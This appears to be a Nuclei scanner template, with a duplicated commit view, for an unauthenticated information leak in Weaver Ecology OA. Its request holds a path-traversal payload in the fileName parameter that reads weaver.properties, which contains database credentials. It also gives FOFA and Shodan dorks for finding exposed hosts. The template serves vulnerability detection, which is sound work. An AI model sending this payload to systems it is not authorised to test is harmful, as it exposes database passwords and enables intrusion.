nuclei-templates/http/misconfiguration/ecology-info-leak.yaml

id: ecology-info-leak

info:
  name: Ecology  - Information Exposure
  author: qianbenhyu
  severity: high
  description: |
    The "ecology" component exposes a file that contains sensitive database credentials (dbuser/dbpass).
  reference:
    - https://twitter.com/win3zz/status/1694239332465520684
  metadata:
    fofa-dork: app="泛微-协同办公OA"
    shodan-dork: ecology_JSessionid
    verified: true
    max-request: 1
  tags: lfi,unauth,aria2,webui

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/portalTsLogin/utils/getE9DevelopAllNameValue2?fileName=portaldev_%2f%2e%2e%2fweaver%2eproperties"

    matchers:
      - type: word
        part: body
        words:
          - "ecology.password"
          - "ecology.charset"
        condition: or

      - type: status
        status:
          - 200
Ecology - Information Exposure 2023-08-29 08:12:37 +00:00			`id: ecology-info-leak`

			`info:`
			`name: Ecology - Information Exposure`
			`author: qianbenhyu`
			`severity: high`
			`description: \|`
			`The "ecology" component exposes a file that contains sensitive database credentials (dbuser/dbpass).`
			`reference:`
			`- https://twitter.com/win3zz/status/1694239332465520684`
			`metadata:`
			`fofa-dork: app="泛微-协同办公OA"`
			`shodan-dork: ecology_JSessionid`
			`verified: true`
			`max-request: 1`
			`tags: lfi,unauth,aria2,webui`

			`http:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/api/portalTsLogin/utils/getE9DevelopAllNameValue2?fileName=portaldev_%2f%2e%2e%2fweaver%2eproperties"`

			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- "ecology.password"`
			`- "ecology.charset"`
			`condition: or`

			`- type: status`
			`status:`
			`- 200`